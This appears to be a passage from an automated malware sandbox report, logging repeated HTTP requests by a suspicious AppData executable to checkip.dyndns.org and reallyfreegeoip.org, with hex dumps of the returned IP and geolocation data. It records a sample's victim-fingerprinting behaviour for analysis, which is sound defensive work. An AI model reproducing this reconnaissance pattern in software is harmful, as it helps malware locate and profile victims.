                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 38 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.78</body></html>
                                                                                                          Oct 30, 2024 08:32:09.918653965 CET127OUTGET / HTTP/1.1
                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                          Host: checkip.dyndns.org
                                                                                                          Oct 30, 2024 08:32:10.216654062 CET275INHTTP/1.1 200 OK
                                                                                                          Date: Wed, 30 Oct 2024 07:32:10 GMT
                                                                                                          Content-Type: text/html
                                                                                                          Content-Length: 106
                                                                                                          Connection: keep-alive
                                                                                                          Cache-Control: no-cache
                                                                                                          Pragma: no-cache
                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 38 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.78</body></html>
                                                                                                          Oct 30, 2024 08:32:10.430047989 CET275INHTTP/1.1 200 OK
                                                                                                          Date: Wed, 30 Oct 2024 07:32:10 GMT
                                                                                                          Content-Type: text/html
                                                                                                          Content-Length: 106
                                                                                                          Connection: keep-alive
                                                                                                          Cache-Control: no-cache
                                                                                                          Pragma: no-cache
                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 38 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.78</body></html>
                                                                                                          Oct 30, 2024 08:32:11.144603014 CET127OUTGET / HTTP/1.1
                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                          Host: checkip.dyndns.org
                                                                                                          Oct 30, 2024 08:32:11.452590942 CET275INHTTP/1.1 200 OK
                                                                                                          Date: Wed, 30 Oct 2024 07:32:11 GMT
                                                                                                          Content-Type: text/html
                                                                                                          Content-Length: 106
                                                                                                          Connection: keep-alive
                                                                                                          Cache-Control: no-cache
                                                                                                          Pragma: no-cache
                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 38 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.78</body></html>
                                                                                                          Oct 30, 2024 08:32:11.662090063 CET275INHTTP/1.1 200 OK
                                                                                                          Date: Wed, 30 Oct 2024 07:32:11 GMT
                                                                                                          Content-Type: text/html
                                                                                                          Content-Length: 106
                                                                                                          Connection: keep-alive
                                                                                                          Cache-Control: no-cache
                                                                                                          Pragma: no-cache
                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 38 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.78</body></html>


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          2192.168.2.2249168132.226.247.73803872C:\Users\user\AppData\Roaming\cdlpohalgate39567.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          Oct 30, 2024 08:32:12.873116016 CET127OUTGET / HTTP/1.1
                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                          Host: checkip.dyndns.org
                                                                                                          Oct 30, 2024 08:32:13.865834951 CET323INHTTP/1.1 200 OK
                                                                                                          Date: Wed, 30 Oct 2024 07:32:13 GMT
                                                                                                          Content-Type: text/html
                                                                                                          Content-Length: 106
                                                                                                          Connection: keep-alive
                                                                                                          Cache-Control: no-cache
                                                                                                          Pragma: no-cache
                                                                                                          X-Request-ID: cd29c3f57203944feabbea6232cf94e8
                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 38 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.78</body></html>


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          3192.168.2.2249170132.226.8.169803872C:\Users\user\AppData\Roaming\cdlpohalgate39567.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          Oct 30, 2024 08:32:15.190013885 CET127OUTGET / HTTP/1.1
                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                          Host: checkip.dyndns.org
                                                                                                          Oct 30, 2024 08:32:16.072778940 CET275INHTTP/1.1 200 OK
                                                                                                          Date: Wed, 30 Oct 2024 07:32:15 GMT
                                                                                                          Content-Type: text/html
                                                                                                          Content-Length: 106
                                                                                                          Connection: keep-alive
                                                                                                          Cache-Control: no-cache
                                                                                                          Pragma: no-cache
                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 38 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.78</body></html>
                                                                                                          Oct 30, 2024 08:32:16.277937889 CET275INHTTP/1.1 200 OK
                                                                                                          Date: Wed, 30 Oct 2024 07:32:15 GMT
                                                                                                          Content-Type: text/html
                                                                                                          Content-Length: 106
                                                                                                          Connection: keep-alive
                                                                                                          Cache-Control: no-cache
                                                                                                          Pragma: no-cache
                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 38 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.78</body></html>


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          4192.168.2.2249172158.101.44.242803872C:\Users\user\AppData\Roaming\cdlpohalgate39567.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          Oct 30, 2024 08:32:16.895293951 CET127OUTGET / HTTP/1.1
                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                          Host: checkip.dyndns.org
                                                                                                          Oct 30, 2024 08:32:17.982361078 CET323INHTTP/1.1 200 OK
                                                                                                          Date: Wed, 30 Oct 2024 07:32:17 GMT
                                                                                                          Content-Type: text/html
                                                                                                          Content-Length: 106
                                                                                                          Connection: keep-alive
                                                                                                          Cache-Control: no-cache
                                                                                                          Pragma: no-cache
                                                                                                          X-Request-ID: 1369c96cb3499e14d05ed3a71e443b79
                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 38 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.78</body></html>


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          5192.168.2.2249174132.226.8.169803872C:\Users\user\AppData\Roaming\cdlpohalgate39567.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          Oct 30, 2024 08:32:18.834793091 CET151OUTGET / HTTP/1.1
                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                          Host: checkip.dyndns.org
                                                                                                          Connection: Keep-Alive
                                                                                                          Oct 30, 2024 08:32:19.723748922 CET275INHTTP/1.1 200 OK
                                                                                                          Date: Wed, 30 Oct 2024 07:32:19 GMT
                                                                                                          Content-Type: text/html
                                                                                                          Content-Length: 106
                                                                                                          Connection: keep-alive
                                                                                                          Cache-Control: no-cache
                                                                                                          Pragma: no-cache
                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 38 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.78</body></html>


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          6192.168.2.2249176132.226.8.169803872C:\Users\user\AppData\Roaming\cdlpohalgate39567.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          Oct 30, 2024 08:32:20.744688988 CET151OUTGET / HTTP/1.1
                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                          Host: checkip.dyndns.org
                                                                                                          Connection: Keep-Alive
                                                                                                          Oct 30, 2024 08:32:21.633785963 CET275INHTTP/1.1 200 OK
                                                                                                          Date: Wed, 30 Oct 2024 07:32:21 GMT
                                                                                                          Content-Type: text/html
                                                                                                          Content-Length: 106
                                                                                                          Connection: keep-alive
                                                                                                          Cache-Control: no-cache
                                                                                                          Pragma: no-cache
                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 38 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.78</body></html>


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          7192.168.2.2249178132.226.247.73803872C:\Users\user\AppData\Roaming\cdlpohalgate39567.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          Oct 30, 2024 08:32:22.461275101 CET151OUTGET / HTTP/1.1
                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                          Host: checkip.dyndns.org
                                                                                                          Connection: Keep-Alive
                                                                                                          Oct 30, 2024 08:32:24.100095034 CET323INHTTP/1.1 200 OK
                                                                                                          Date: Wed, 30 Oct 2024 07:32:23 GMT
                                                                                                          Content-Type: text/html
                                                                                                          Content-Length: 106
                                                                                                          Connection: keep-alive
                                                                                                          Cache-Control: no-cache
                                                                                                          Pragma: no-cache
                                                                                                          X-Request-ID: 3a40508beaeae39f7e458612281b9ca9
                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 38 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.78</body></html>
                                                                                                          Oct 30, 2024 08:32:24.314028025 CET323INHTTP/1.1 200 OK
                                                                                                          Date: Wed, 30 Oct 2024 07:32:23 GMT
                                                                                                          Content-Type: text/html
                                                                                                          Content-Length: 106
                                                                                                          Connection: keep-alive
                                                                                                          Cache-Control: no-cache
                                                                                                          Pragma: no-cache
                                                                                                          X-Request-ID: 3a40508beaeae39f7e458612281b9ca9
                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 38 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.78</body></html>


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          8192.168.2.2249180193.122.130.0803872C:\Users\user\AppData\Roaming\cdlpohalgate39567.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          Oct 30, 2024 08:32:25.278639078 CET151OUTGET / HTTP/1.1
                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                          Host: checkip.dyndns.org
                                                                                                          Connection: Keep-Alive
                                                                                                          Oct 30, 2024 08:32:28.116275072 CET323INHTTP/1.1 200 OK
                                                                                                          Date: Wed, 30 Oct 2024 07:32:28 GMT
                                                                                                          Content-Type: text/html
                                                                                                          Content-Length: 106
                                                                                                          Connection: keep-alive
                                                                                                          Cache-Control: no-cache
                                                                                                          Pragma: no-cache
                                                                                                          X-Request-ID: 4cb8b57b9ce19aa30e7dc431fdaa30a8
                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 38 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.78</body></html>
                                                                                                          Oct 30, 2024 08:32:28.325956106 CET323INHTTP/1.1 200 OK
                                                                                                          Date: Wed, 30 Oct 2024 07:32:28 GMT
                                                                                                          Content-Type: text/html
                                                                                                          Content-Length: 106
                                                                                                          Connection: keep-alive
                                                                                                          Cache-Control: no-cache
                                                                                                          Pragma: no-cache
                                                                                                          X-Request-ID: 4cb8b57b9ce19aa30e7dc431fdaa30a8
                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 38 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.78</body></html>


                                                                                                          HTTPS Proxied Packets

                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          0192.168.2.2249166188.114.97.34433872C:\Users\user\AppData\Roaming\cdlpohalgate39567.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          2024-10-30 07:32:10 UTC87OUTGET /xml/173.254.250.78 HTTP/1.1
                                                                                                          Host: reallyfreegeoip.org
                                                                                                          Connection: Keep-Alive
                                                                                                          2024-10-30 07:32:11 UTC891INHTTP/1.1 200 OK
                                                                                                          Date: Wed, 30 Oct 2024 07:32:11 GMT
                                                                                                          Content-Type: text/xml
                                                                                                          Content-Length: 359
                                                                                                          Connection: close
                                                                                                          apigw-requestid: AcLvmhW3vHcESEw=
                                                                                                          Cache-Control: max-age=31536000
                                                                                                          CF-Cache-Status: HIT
                                                                                                          Age: 21554
                                                                                                          Last-Modified: Wed, 30 Oct 2024 01:32:57 GMT
                                                                                                          Accept-Ranges: bytes
                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=oIrfGTdJT29MaWN0MS%2FSmIUwFTv9mReEilbMus2B2O6LLxxTyTRYoNvjUWfLKftKZ8tMtixgdh36Qr%2F7TAGYZJ3ddKtb42CNI3%2FQMvvC5akIL%2BwHwan%2BcM02J1l086NiUhE%2FPzBY"}],"group":"cf-nel","max_age":604800}
                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                          Server: cloudflare
                                                                                                          CF-RAY: 8da9b5c0f98ceaf6-DFW
                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1222&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2850&recv_bytes=701&delivery_rate=2291139&cwnd=230&unsent_bytes=0&cid=c84df1319661406e&ts=253&x=0"
                                                                                                          2024-10-30 07:32:11 UTC359INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 38 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4b 69 6c 6c 65 65 6e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 36 35 34 39 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e
                                                                                                          Data Ascii: <Response><IP>173.254.250.78</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Killeen</City><ZipCode>76549</ZipCode><TimeZone>America/Chicago</TimeZone>


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          1192.168.2.2249167188.114.97.34433872C:\Users\user\AppData\Roaming\cdlpohalgate39567.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          2024-10-30 07:32:12 UTC63OUTGET /xml/173.254.250.78 HTTP/1.1
                                                                                                          Host: reallyfreegeoip.org
                                                                                                          2024-10-30 07:32:12 UTC887INHTTP/1.1 200 OK
                                                                                                          Date: Wed, 30 Oct 2024 07:32:12 GMT
                                                                                                          Content-Type: text/xml
                                                                                                          Content-Length: 359
                                                                                                          Connection: close
                                                                                                          apigw-requestid: AcLvmhW3vHcESEw=
                                                                                                          Cache-Control: max-age=31536000
                                                                                                          CF-Cache-Status: HIT
                                                                                                          Age: 21555
                                                                                                          Last-Modified: Wed, 30 Oct 2024 01:32:57 GMT
                                                                                                          Accept-Ranges: bytes
                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=WV9UIDX0YWDjpAAB1Aq%2FhOdDfWyrMeHLEMrc2A4%2FJeRJ1NwQhIlqnLVeo7iVNeQbN4wVpgcbRR2Pm8DV2fRrZAOLT5x2%2FTuwlUNcPO87h4e3ZyZMHjhcec9Zczwj%2BZTzZUAbYIVz"}],"group":"cf-nel","max_age":604800}
                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                          Server: cloudflare
                                                                                                          CF-RAY: 8da9b5c81e056bec-DFW
                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1028&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2851&recv_bytes=701&delivery_rate=2726930&cwnd=251&unsent_bytes=0&cid=32c5a0e290e2b006&ts=171&x=0"
                                                                                                          2024-10-30 07:32:12 UTC359INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 38 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4b 69 6c 6c 65 65 6e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 36 35 34 39 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e
                                                                                                          Data Ascii: <Response><IP>173.254.250.78</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Killeen</City><ZipCode>76549</ZipCode><TimeZone>America/Chicago</TimeZone>


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          2192.168.2.2249169188.114.97.34433872C:\Users\user\AppData\Roaming\cdlpohalgate39567.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          2024-10-30 07:32:14 UTC87OUTGET /xml/173.254.250.78 HTTP/1.1
                                                                                                          Host: reallyfreegeoip.org
                                                                                                          Connection: Keep-Alive
                                                                                                          2024-10-30 07:32:14 UTC893INHTTP/1.1 200 OK
                                                                                                          Date: Wed, 30 Oct 2024 07:32:14 GMT
                                                                                                          Content-Type: text/xml
                                                                                                          Content-Length: 359
                                                                                                          Connection: close
                                                                                                          apigw-requestid: AcLvmhW3vHcESEw=
                                                                                                          Cache-Control: max-age=31536000
                                                                                                          CF-Cache-Status: HIT
                                                                                                          Age: 21557
                                                                                                          Last-Modified: Wed, 30 Oct 2024 01:32:57 GMT
                                                                                                          Accept-Ranges: bytes
                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=vLxV6a5ZpE1ueBp1cVLhG3gaOUERmYmTC2erGqhJhse%2BBFDolx8VC6XftWYjRoDSjhQ1yMnoHrtI6%2F%2Fm49jgnSg5hT%2FpxcINfIjjmh%2FJt1RjJnb7yAoQC%2FQa%2F77HihU7zbKfiOD3"}],"group":"cf-nel","max_age":604800}
                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                          Server: cloudflare
                                                                                                          CF-RAY: 8da9b5d84e8a4665-DFW
                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1125&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2850&recv_bytes=701&delivery_rate=2487972&cwnd=251&unsent_bytes=0&cid=345b24bed52fa86f&ts=352&x=0"
                                                                                                          2024-10-30 07:32:14 UTC359INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 38 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4b 69 6c 6c 65 65 6e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 36 35 34 39 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e
                                                                                                          Data Ascii: <Response><IP>173.254.250.78</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Killeen</City><ZipCode>76549</ZipCode><TimeZone>America/Chicago</TimeZone>


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          3192.168.2.2249171188.114.97.34433872C:\Users\user\AppData\Roaming\cdlpohalgate39567.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          2024-10-30 07:32:16 UTC87OUTGET /xml/173.254.250.78 HTTP/1.1
                                                                                                          Host: reallyfreegeoip.org
                                                                                                          Connection: Keep-Alive
                                                                                                          2024-10-30 07:32:16 UTC885INHTTP/1.1 200 OK
                                                                                                          Date: Wed, 30 Oct 2024 07:32:16 GMT
                                                                                                          Content-Type: text/xml
                                                                                                          Content-Length: 359
                                                                                                          Connection: close
                                                                                                          apigw-requestid: AcLvmhW3vHcESEw=
                                                                                                          Cache-Control: max-age=31536000
                                                                                                          CF-Cache-Status: HIT
                                                                                                          Age: 21559
                                                                                                          Last-Modified: Wed, 30 Oct 2024 01:32:57 GMT
                                                                                                          Accept-Ranges: bytes
